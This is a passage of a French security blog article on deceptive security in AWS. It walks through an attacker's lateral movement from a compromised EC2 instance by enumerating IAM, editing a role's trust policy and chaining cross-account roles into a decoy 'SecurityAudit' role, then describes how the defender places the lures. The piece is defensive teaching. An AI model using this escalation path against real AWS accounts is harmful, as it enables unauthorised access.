<p style="text-align: justify;"><span data-contrast="none">Des techniques classiques de protection et de détection contre les intrusions existent déjà et se développent de manière exponentielle. Celles-ci sont efficaces pour les attaques les plus courantes mais ne sont bien souvent pas ou peu adaptées aux spécificités du Cloud.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Ainsi, des questions se posent sur l’utilisation de </span><b><span data-contrast="none">stratégies proactives</span></b><span data-contrast="none">, telle que la </span><b><span data-contrast="none">Deceptive Security</span></b><span data-contrast="none">, permettant de garder une longueur d&rsquo;avance sur les attaquants. Notamment dans le cadre de Cyber-Résilience : comment utiliser ce genre de technologie sur des environnements de types traditionnels et Cloud ?</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><i><span data-contrast="none">Dans quels cas utiliser des techniques de Deceptive Security ? Est-ce que les solutions de Deceptive Security dans le Cloud sont développées aujourd’hui ? Y a-t-il des stratégies spécifiques à envisager dans le cadre d’un environnement Cloud comparé au traditionnel ?</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Nous répondrons à ces questions dans une </span><b><span data-contrast="none">mini-série de 2 articles</span></b><span data-contrast="none">. Dans le<a href="_wp_link_placeholder" data-wplink-edit="true"> premier article</a>, nous vous montrions comment développer et évaluer votre stratégie de leurre. Dans le second article, nous présentons un exemple pratique de sécurité trompeuse dans AWS.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:360,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:360,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> </span></p>
<h2 style="text-align: justify;" aria-level="1"><span data-contrast="none">Postulats initiaux et choix du scenario </span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:567,&quot;335559738&quot;:240,&quot;335559739&quot;:360,&quot;335559740&quot;:259,&quot;335559991&quot;:567}"> </span></h2>
<p style="text-align: justify;"><span data-contrast="none">Grâce à l’expertise Wavestone et aux ressources partagées par notre CyberLab, nous avons conçu un scénario simple pour illustrer l’utilisation de leurres en </span><b><span data-contrast="none">environnement Cloud AWS</span></b><span data-contrast="none">. L’exemple détaillé dans la suite est inspiré par un scénario CTF (Capture The Flag) dessiné par l’équipe du CyberLab pour illustrer la propagation latérale d’un attaquant.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">De même manière que dans les scénarios traités précédemment, </span><b><span data-contrast="none">où nous utilisions la Deceptive pour la détection d’attaquants déjà introduits au sein du SI</span></b><span data-contrast="none">, il s’agit encore une fois d’éviter d’attirer des attaquants opportunistes sur notre réseau dans une optique de Deceptive « de recherche ». Ainsi, nous postulons une infection initiale quelconque, fortement probable (à fortiori dans des environnements Cloud peu maitrisés), et nous concentrons sur la détection de l’intrus en cours de déploiement sur le réseau.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">L’application de cette démarche à un environnement AWS n’est pas innocent. Un des apports du Cloud repose en effet dans la gestion des identités simplifiée et la délégation aisée des accès, mais </span><b><span data-contrast="none">cet atout peut toutefois tourner à l’avantage d’attaquants </span></b><span data-contrast="none">en cas d’exposition involontaire de ressources ou de création de liens dangereux entre zones de niveau de sécurité différents. Les mesures de durcissement et de prévention ne manquent pas et sont généreusement promues par les fournisseurs Cloud eux-mêmes mais ces vulnérabilités demeurent le lot des comptes et souscriptions peu durcis, dont l’administration obéit trop souvent à des règles encore informelles. </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><b><span data-contrast="none">Le scénario d’attaque et de leurrage associé reposera donc sur ce principe de liaison entre deux comptes AWS</span></b><span data-contrast="none">, ici conçus comme un environnement de production et un autre de développement, moins critique. Nous nous placerons dans un scénario où une relation d’approbation permet de se propager depuis le compte de développement vers le compte de production, via l’endossement d’un rôle cross-account. </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p> </p>
<h2 style="text-align: justify;" aria-level="1"><span data-contrast="none">Scénario de leurrage</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:567,&quot;335559738&quot;:240,&quot;335559739&quot;:360,&quot;335559740&quot;:259,&quot;335559991&quot;:567}"> </span></h2>
<h3 style="text-align: justify;" aria-level="2"><span data-contrast="none">Description du scénario </span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1418,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:851}"> </span></h3>
<p style="text-align: justify;"><span data-contrast="none">Partons de l’idée selon laquelle </span><b><span data-contrast="none">un</span></b> <b><span data-contrast="none">utilisateur non autorisé a obtenu des accès</span></b> <b><span data-contrast="none">sur une machine EC2</span></b><span data-contrast="none"> (domainIntegrated-EC2) au sein du compte de test (infection initiale). Après une première connexion réussie, il tente d’accéder à des ressources couramment utilisées telles que Amazon Simple Storage Service (Amazon S3) ou </span><b><span data-contrast="none">essaye d&rsquo;élever ses privilèges</span></b><span data-contrast="none"> en assumant d&rsquo;autres rôles (rôle chaining) liés au rôle auquel il a accès.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><b><span data-contrast="none">Ce</span></b> <b><span data-contrast="none">scénario de propagation latérale</span></b> <b><span data-contrast="none">est une technique d&rsquo;attaque courante dans les environnements Cloud</span></b><span data-contrast="none"> en raison de la nature de leur architecture et du modèle de responsabilité du cloud computing, où le client est responsable de la sécurisation de ses applications, de ses données et du contrôle d&rsquo;accès (alors que le fournisseur veille à la sécurité de l’infrastructure sous-jacente).</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Tel qu’illustré ci-dessous, </span><b><span data-contrast="none">les attaques de propagation latérale tirent parti des faiblesses des contrôles de sécurité du client</span></b><span data-contrast="none">, telles que des autorisations mal configurées ou l’application de mécanismes d’authentification trop faibles, pour obtenir un accès non autorisé à d&rsquo;autres ressources dans l&rsquo;environnement.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"> <br /><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22453 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/1.jpg" alt="" width="1269" height="655" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/1.jpg 1269w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/1-370x191.jpg 370w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/1-71x37.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/1-768x396.jpg 768w" sizes="auto, (max-width: 1269px) 100vw, 1269px" /></span></p>
<p style="text-align: center;"><i><span data-contrast="none">Scénario du point de vue de l’attaquant</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:1135,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> </span></p>
<p><span data-contrast="none">0. Après avoir compromis une machine EC2 « domainIntegrated », l’attaquant s’aperçoit qu’un rôle lui est associé (« Semi-Admin-role ») :</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1135,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> </span> <img loading="lazy" decoding="async" class="aligncenter wp-image-22455 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/2.jpg" alt="" width="1242" height="125" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/2.jpg 1242w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/2-437x44.jpg 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/2-71x7.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/2-768x77.jpg 768w" sizes="auto, (max-width: 1242px) 100vw, 1242px" /></p>
<p style="text-align: center;"><i><span data-contrast="none">Enumération de la machine EC2 domainIntegrated</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Il énumère ensuite les droits du rôle « Semi-Admin-Role » : </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1135,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22457 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/3.jpg" alt="" width="1172" height="544" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/3.jpg 1172w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/3-411x191.jpg 411w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/3-71x33.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/3-768x356.jpg 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/3-1170x544.jpg 1170w" sizes="auto, (max-width: 1172px) 100vw, 1172px" /></span></p>
<p style="text-align: center;"><i><span data-contrast="none">Enumération des droits du rôle Semi-Admin-Role</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Tout d’abord ce rôle a des </span><b><span data-contrast="none">privilèges de modification</span></b><span data-contrast="none"> sur une ressource du compte « AWS – SHARED » : il peut en effet endosser (sts :assumeRole) et modifier (iam :UpdateRole) un rôle intitulé « LambdaAuto ». Il peut ensuite endosser (par « role chaining », étape 5 du schéma ci-dessus) un autre rôle nommé « SecurityAudit» dans un compte différent, intitulé AWS MASTER.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">L’attaquant réalise par ailleurs </span><b><span data-contrast="none">qu’il peut également assumer directement un autre rôle</span></b><span data-contrast="none"> (« IAM-RO-Role ») du compte AWS – MASTER. Ce dernier rôle attire particulièrement son attention car le compte MASTER suggère par son nom un </span><b><span data-contrast="none">périmètre d’action bien plus important </span></b><span data-contrast="none">que le simple compte SHARED, et le rôle IAM-RO-Role évoque un périmètre de vision étendu sur les ressources de ce compte.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1135,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> </span></p>
<ol style="text-align: justify;">
<li data-leveltext="%1" data-font="Tahoma" data-listid="29" data-list-defn-props="{&quot;335551500&quot;:16711680,&quot;335551671&quot;:0,&quot;335552541&quot;:0,&quot;335559683&quot;:0,&quot;335559684&quot;:-1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769242&quot;:[65533,0],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;%1&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><span data-contrast="none">L’attaquant endosse le « SemiAdmin-role » qui lui permet par la suite d’assumer le rôle « IAM-RO » et tenter d’autres actions qui lui permettront de bien analyser son champ de vision.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></li>
<li data-leveltext="%1" data-font="Tahoma" data-listid="29" data-list-defn-props="{&quot;335551500&quot;:16711680,&quot;335551671&quot;:0,&quot;335552541&quot;:0,&quot;335559683&quot;:0,&quot;335559684&quot;:-1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769242&quot;:[65533,0],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;%1&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><span data-contrast="none">En effet, après avoir assumé le rôle « IAM-RO », il procède à une énumération de l’IAM où il s’aperçoit des rôles et des utilisateurs dans son champ de vision : </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></li>
</ol>
<p style="text-align: justify;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:360,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22459 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/4.jpg" alt="" width="1260" height="294" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/4.jpg 1260w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/4-437x102.jpg 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/4-71x17.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/4-768x179.jpg 768w" sizes="auto, (max-width: 1260px) 100vw, 1260px" /></span></p>
<p style="text-align: center;"><i><span data-contrast="none">Liste des rôles dans le champ de vision du rôle IAM-RO</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:1135,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> </span></p>
<p style="text-align: center;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22461 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/5.jpg" alt="" width="1222" height="213" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/5.jpg 1222w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/5-437x76.jpg 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/5-71x12.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/5-768x134.jpg 768w" sizes="auto, (max-width: 1222px) 100vw, 1222px" /></span></p>
<p style="text-align: center;"><i><span data-contrast="none">Liste des utilisateurs dans le champ de vision du rôle IAM-RO</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:720,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Le rôle « SecurityAudit » attire particulièrement son attention grâce aux </span><b><span data-contrast="none">privilèges</span></b><span data-contrast="none"> que ce nom suggère et la description du rôle qui donne des informations sur lesdits privilèges :</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:491,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22463 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/6.jpg" alt="" width="1264" height="76" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/6.jpg 1264w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/6-437x26.jpg 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/6-71x4.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/6-768x46.jpg 768w" sizes="auto, (max-width: 1264px) 100vw, 1264px" /></span></p>
<p style="text-align: center;"><i><span data-contrast="none">Description du rôle SecurityAudit</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:207,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Toutefois, l’attaquant n’a qu’un accès en lecture sur les ressources listées. Il va donc chercher si certaines de ces ressources sont accessibles en écriture depuis le compte SHARED où il a de hauts privilèges. Par exemple, si certains rôles du comptes MASTER peuvent être endossés par des rôles du compte SHARED :</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-22465 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/7.jpg" alt="" width="1266" height="181" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/7.jpg 1266w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/7-437x62.jpg 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/7-71x10.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/7-768x110.jpg 768w" sizes="auto, (max-width: 1266px) 100vw, 1266px" /></p>
<p style="text-align: center;"><i><span data-contrast="none">Liste des rôles pouvant être assumés depuis un compte externe (ici le compte SHARED)</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:1135,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">L’attaquant investigue la relation d’approbation du rôle « SecurityAudit », qui justement, autorise un endossement par le rôle « LambdaAuto » du compte SHARED.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="none">3. De retour sur le compte SHARED, l’attaquant n’a plus qu’à vérifier que l’autre pendant de cette relation d’approbation, c’est-à-dire que le rôle « LambdaAuto » autorise bien dans sa politique d’approbation l’endossement du rôle « SecurityAudit ». Ce n’est pas le cas, mais le rôle « SemiAdminRole » lui permet de configurer cette autorisation.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="none">4. Une fois la politique d’approbation du rôle « LambdaAuto » modifiée, il peut maintenant assumer le rôle « LambdaAuto ».</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="none">5. Puis, il endosse (par role-chaining) le rôle « SecurityAudit », le véritable leurre.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"> <br /><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:207,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22467 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/8.jpg" alt="" width="1265" height="634" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/8.jpg 1265w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/8-381x191.jpg 381w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/8-71x36.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/8-768x385.jpg 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/8-800x400.jpg 800w" sizes="auto, (max-width: 1265px) 100vw, 1265px" /></span></p>
<p style="text-align: center;"><i><span data-contrast="none">Role chaining de l’attaquant</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:360,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Après sa tentative d’endossement du rôle « SecurityAudit » dont il espère les privilèges d’auditeur sécurité (annoncés en étape 1), l’attaquant se retrouve en réalité sans réels pouvoirs, par exemple :</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"> <br /><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:207,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22469 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/9.jpg" alt="" width="1267" height="78" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/9.jpg 1267w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/9-437x27.jpg 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/9-71x4.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/9-768x47.jpg 768w" sizes="auto, (max-width: 1267px) 100vw, 1267px" /></span></p>
<p style="text-align: center;"><i><span data-contrast="none">Exemple d’un accès refusé depuis le rôle SecurityAudit</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:491,&quot;335559739&quot;:160,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> </span></p>
<p> </p>
<h3 style="text-align: justify;" aria-level="2"><span data-contrast="none">Création des leurres </span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1418,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:851}"> </span></h3>
<p style="text-align: justify;"><span data-contrast="none">Le schéma ci-dessous révèle à présent les ajouts de leurres aux différentes étapes de l’attaque et leur configuration par le défenseur :</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559685&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:257}"> <img loading="lazy" decoding="async" class="aligncenter wp-image-22471 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/10.jpg" alt="" width="1278" height="744" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/10.jpg 1278w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/10-328x191.jpg 328w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/10-67x39.jpg 67w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/10-120x70.jpg 120w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/10-768x447.jpg 768w" sizes="auto, (max-width: 1278px) 100vw, 1278px" /></span></p>
<p style="text-align: center;"><i><span data-contrast="none">Scénario du point de vue du défenseur</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559685&quot;:1135,&quot;335559739&quot;:160,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> </span></p>
<p><span data-contrast="none">0. Le rôle « Semi-Admin-Role » est le </span><b><span data-contrast="none">point d’entrée</span></b><span data-contrast="none"> dans le scenario de leurrage. Il peut donc être associé à toute ressource susceptible d’être compromise (ici l’EC2 « domainIntegrated ») pour rediriger l’attaquant vers les leurres. </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Aucune alerte n’est configurée à ce niveau car la connexion du rôle Semi-Admin-Rôle à l’ensemble des ressources du compte SHARED rend probable le déclenchement d’un endossement involontaire et, par suite, d’alertes faussement positives.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:720,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> </span></p>
<p><span data-contrast="none">1. Une fois le rôle IAM-RO assumé, l’attaquant est donc invité dans un compte entièrement dédié au leurrage et se familiarise avec les ressources alentour, </span><b><span data-contrast="none">obtenant ainsi une vue d&rsquo;ensemble complète de tous les rôles et utilisateurs du compte</span></b><span data-contrast="none">.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="none">2. En peuplant le champ de vision de l&rsquo;attaquant, non seulement avec le leurre principal « SecurityAudit », mais également avec d&rsquo;autres rôles et utilisateurs factices, nous nous assurons que l’aspect du compte semble crédible et que notre leurre-clé, le rôle SecurityAudit ne soit pas isolé.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Nous ajoutons ainsi au sein du compte : </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:720,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:284}"> </span></p>
<ul style="text-align: justify;">
